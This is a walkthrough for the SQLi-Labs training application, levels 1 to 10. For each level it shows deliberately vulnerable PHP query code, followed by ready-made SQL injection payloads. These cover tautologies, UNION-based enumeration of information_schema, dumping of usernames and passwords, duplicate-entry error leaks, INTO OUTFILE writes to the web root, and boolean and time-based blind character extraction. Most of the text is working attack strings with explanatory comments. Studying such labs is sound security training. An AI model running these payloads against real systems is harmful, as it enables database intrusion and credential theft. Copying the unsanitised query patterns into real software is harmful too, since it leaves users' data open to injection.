
SQLi-Labs Less 1-10

Less-1 GET - Error based - Single Quotes - String (error-based injection: the raw MySQL error text is echoed back to the client, so every syntax mistake and every error-carrying payload is visible)

Code:

// Less-1: the raw GET parameter is interpolated into the query string, so a single
// quote in ?id= terminates the '...' literal and the rest of the value becomes SQL.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // No escaping, casting or parameter binding: string-context SQL injection.
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     // NOTE(review): the query execution and the fetch that populate $row are
     // elided in this excerpt.
     if($row)
        {
        // Both selected columns are echoed verbatim, so a UNION row is displayed too.
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        // The MySQL error message is returned to the client: the error-based oracle.
        print_r(mysql_error());

Code:

-- Less-1 payloads. Each line is the value of the ?id= GET parameter.
-- The trailing "--+" is a MySQL line comment: "+" decodes to a space in the URL,
-- and MySQL only treats "--" as a comment when whitespace follows it. It swallows
-- the application's trailing " LIMIT 0,1".
-- Tautology: confirms the injection point (the first row comes back).
' or 1=1 --+
-- 1=2 empties the original result so the UNION row is what gets echoed; the UNION
-- must supply as many columns as "SELECT *" on users (three). user() and database()
-- land in the two echoed fields.
' and 1=2 union select 1,user(),database() --+
-- Enumerate table names. 0x7365637572697479 is the hex encoding of 'security'
-- (a hex literal needs no quotes, so it survives quote filtering). LIMIT 3,1 = fourth table.
' and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
-- Enumerate columns of security.users (0x7573657273 = 'users'), one column per request.
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
-- Dump credentials one row per request; bump the LIMIT offset for the next row.
' and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-2 GET - Error based - Integer based (the id is interpolated unquoted, so no quote is needed to break out)

Code:

// Less-2: numeric context. The parameter is interpolated without quotes, so any
// value that starts with a number and continues with SQL is accepted as-is.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // No (int) cast or binding: "1 or 1=1" becomes part of the WHERE clause.
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // Selected columns are echoed, so UNION-injected values are displayed.
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        // Raw MySQL error text goes to the client.
        print_r(mysql_error());

Code:

-- Less-2 payloads (numeric context): the value is not quoted in the query, so the
-- payload simply continues the expression after the number. "--+" comments out the
-- trailing " LIMIT 0,1" ("+" is a URL-encoded space that MySQL's "-- " comment needs).
1 or 1=1 --+
-- Same UNION chain as Less-1: 1=2 suppresses the real row; three columns match users.
1 and 1=2 union select 1,user(),database() --+
-- 0x7365637572697479 = 'security'; LIMIT 3,1 returns the fourth table name.
1 and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
-- 0x7573657273 = 'users'; walk the column names one offset at a time.
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
-- One credential row per request; raise the LIMIT offset for the next row.
1 and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-3 GET - Error based - Single Quotes with twist - String

Code:

// Less-3: the value sits inside quotes AND parentheses, id=('...'). A payload must
// therefore close both, hence the "')" prefix in the injection strings.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Still plain string interpolation of untrusted input.
     $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // Echoed columns make UNION results visible.
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        // The error message reveals the "('...')" wrapping around the injected value.
        print_r(mysql_error());

Code:

-- Less-3 payloads: "')" closes the string literal and the parenthesis of id=('$id');
-- the unmatched ")" left in the original query is removed by the "--+" comment.
') or 1=1 --+
-- Otherwise identical to Less-1: empty the real result, UNION three columns.
')  and 1=2 union select 1,user(),database() --+
-- 0x7365637572697479 = 'security'; LIMIT 3,1 = fourth table.
')  and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
-- 0x7573657273 = 'users'; columns by offset.
')  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
')  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
-- Credentials, one row per request.
')  and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-4 GET - Error based - Double Quotes - String

Code:

// Less-4: the application wraps the value in double quotes itself and then places
// it in parentheses, so the effective query is id=("<input>"). The breakout
// character is therefore '"' followed by ')'.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Wrapping in quotes is not sanitisation: a '"' inside $id still terminates the literal.
     $id = '"' . $id . '"';
     $sql=" SELECT * FROM users WHERE id=($id) LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // Echoed columns make UNION results visible.
        echo 'Your Login name:'. $row['username'];
        echo 'Your Password:' .$row['password'];
        }
        else
        {
        // The error text shows the '"' and '(' context to the attacker.
        print_r(mysql_error());

Code:

") or 1=1 --+
")  and 1=2 union select 1,user(),database() --+
")  and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
")  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
")  and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
")  and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+

Less-5 GET - Double injection - Single Quotes - String (the page no longer echoes query columns, only a fixed message or the MySQL error, so data is exfiltrated through the error text)
Double-query (duplicate-entry error) template: union select 1 from (select+count(*),concat(floor(rand(0)*2),(injected subquery))a from information_schema.tables group by a)b — GROUP BY on a key built from rand(0) collides on a later row and MySQL raises a "Duplicate entry '...' for key" error whose message contains the subquery's result. The "+" is a URL-encoded space.

Code:

// Less-5: same vulnerable query as Less-1, but the success branch prints a fixed
// string instead of the row, so a UNION row is no longer visible. The only
// data channel left is the MySQL error message printed in the else branch.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Untrusted $id interpolated into a single-quoted literal.
     $sql=" SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // No column output: a successful query leaks nothing but "true".
        echo 'You are in...........';
        }
        else
        {
        // Error text is still echoed, so payloads that embed data in an error work.
        print_r(mysql_error());

Code:

-- Less-5 payloads: the page prints only "You are in" or the MySQL error, so data
-- is smuggled into a "Duplicate entry '...'" error: count(*) grouped by a key made
-- of floor(rand(0)*2) plus the wanted value; the colliding key (and the value) appear
-- in the error message.
' or 1=1 --+
-- NOTE(review): this line uses unseeded rand(), unlike rand(0) below; the
-- duplicate-key collision is then not guaranteed on every request. Seeding with 0
-- makes the sequence deterministic. 0x22 is a '"' separator between the three values.
' union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --+
-- NOTE(review): "limit 3,4" asks for up to four rows from offset 3, but this is a
-- scalar subquery (must return exactly one row), so it only works while the schema
-- has at most four tables. "limit 3,1", as used in Less-1, is the robust form.
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
-- 0x7573657273 = 'users'; column names one offset at a time.
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
-- Credentials: username and password joined with 0x22 ('"'); raise the offset per row.
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+

Less-6 GET - Double injection - Double Quotes - String

Code:

// Less-6: the Less-5 scenario with the value wrapped in double quotes by the
// application, so the breakout character is '"' instead of "'".
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Adding quotes around untrusted input does not neutralise a quote inside it.
     $id = '"'.$id.'"';
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // Fixed message only; no row data is shown.
        echo 'You are in...........';
        }
        else
        {
        // MySQL error text is the remaining output channel.
        print_r(mysql_error());

Code:

" or 1=1 --+
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22, user(),0x22,database())))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+

Less-7 GET - Dump into outfile - String (exfiltration by writing query output to a file with SELECT ... INTO OUTFILE; this needs the MySQL FILE privilege, a target directory permitted by secure_file_priv and writable by the mysqld process, and a way to read the file back, e.g. over HTTP when it lands under the web root)

Code:

// Less-7: the value is wrapped as id=(('...')), so a payload must close the quote
// and two parentheses ("'))"). The real MySQL error is no longer printed, only a
// generic message, which removes the error-based channel; the lab expects the
// attacker to write results to disk with INTO OUTFILE instead.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Untrusted $id still interpolated into the query.
     $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // Fixed success message; no row data.
        echo 'You are in.... Use outfile......';
        }
        else
        {
        // A constant error string: still a true/false oracle, but no MySQL detail.
        echo 'You have an error in your SQL syntax';
        //print_r(mysql_error());

Code:

-- Less-7 payloads: the error text is suppressed, so results are written to files
-- with INTO OUTFILE rather than echoed. Prerequisites not visible on this page,
-- verify before relying on them: the DB account needs the FILE privilege,
-- secure_file_priv must allow the target directory, mysqld must be able to write
-- there, and the file must be retrievable (e.g. /var/www served over HTTP).
-- NOTE(review): INTO OUTFILE refuses to overwrite an existing file, so use a fresh
-- name for each run.
-- "'))" closes the string literal and both parentheses of id=(('$id')).
')) or 1=1 --+
-- MySQL accepts INTO OUTFILE before FROM; every matching table name is written,
-- so no LIMIT walking is needed.
')) and 1=2 union select 1,2,TABLE_NAME into outfile '/var/www/tables.txt' from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 --+
-- 0x7573657273 = 'users'; all column names of security.users in one file.
')) and 1=2 union select 1,2,COLUMN_NAME into outfile '/var/www/column.txt' from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 --+
-- The "+" after "outfile" is a URL-encoded space (same mechanism as in "--+").
-- Dumps every credential row at once.
')) and 1=2 union select 1,username,password into outfile+'/var/www/data.txt' from security.users --+

Less-8 GET - Blind - Boolean Based - Single Quotes (no data and no error is ever shown; the only signal is whether the "You are in" message appears)

Code:

// Less-8: boolean-blind variant. The success branch prints a fixed message and the
// failure branch prints nothing at all, so the response differs only in the presence
// of that message. Each request therefore answers one yes/no question.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Untrusted $id interpolated into a single-quoted literal.
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        // The only observable output: present when the injected condition is true.
        echo 'You are in...........';
        }
        else
        {
        // Everything that could leak (message, MySQL error) is commented out.
        //echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

-- Less-8 payloads (boolean blind): the page shows "You are in" for a true
-- condition and nothing for a false one, so each request leaks one comparison.
-- Tautology: confirms the oracle responds.
1' or 1=1 --+
-- 115 = 's', the first character of database() ('security'). Vary the substr
-- offset and the compared code to read the rest. A ">" comparison with a binary
-- search over the ASCII range needs far fewer requests than equality probing.
1' and ascii(substr(database(),1,1))=115 --+
-- 117 = 'u' (fourth table). NOTE(review): "limit 3,4" in a scalar subquery only
-- works while at most four tables exist; "limit 3,1" is the safe form.
1' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --+
-- 117 = 'u' and 112 = 'p': first letters of the column names (0x7573657273 = 'users').
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --+
-- 68 = 'D': first character of the first username and of the first password.
-- "users" is unqualified here, so it resolves in the connection's current database.
1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+
1' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --+

Less-9 GET - Blind - Time Based - Single Quotes

Code:

// Less-9: time-based blind. Both branches print the same text, so the response
// body is identical for true and false; the only remaining side channel is how
// long the server takes to answer, which sleep() in the payload controls.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Untrusted $id interpolated into a single-quoted literal.
     $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        // Same message as the success branch: no content-based oracle at all.
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

-- Less-9 payloads (time-based blind): the response body never changes, so
-- if(<condition>, sleep(5), 1) turns a true condition into a ~5 s delay. Measure
-- response time against a baseline; keep the delay well above network jitter.
-- 115 = 's': first character of database() ('security').
1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
-- 117 = 'u' (fourth table, 0x7365637572697479 = 'security'). NOTE(review):
-- "limit 3,4" in a scalar subquery relies on at most four tables; prefer "limit 3,1".
1' and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
-- 117 = 'u' and 112 = 'p': first letters of the users columns (0x7573657273 = 'users').
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
-- 68 = 'D': first character of the first username / password. One character per
-- request at 5 s each is slow; a ">" binary search cuts the request count sharply.
1' and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1' and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+

Less-10 GET - Blind - Time Based - Double Quotes

Code:

// Less-10: Less-9 with the value wrapped in double quotes by the application, so
// the breakout character is '"'. Output is identical on both branches; timing is
// the only oracle.
if(isset($_GET['id']))
{
     $id=$_GET['id'];
     // Wrapping in quotes is not sanitisation.
     $id = '"'.$id.'"';
     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
     // NOTE(review): query execution and fetch of $row are elided in this excerpt.
     if($row)
        {
        echo 'You are in...........';
        }
        else
        {
        // Same message as the success branch; no content-based signal.
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";

Code:

1" and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1" and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1" and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1" and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
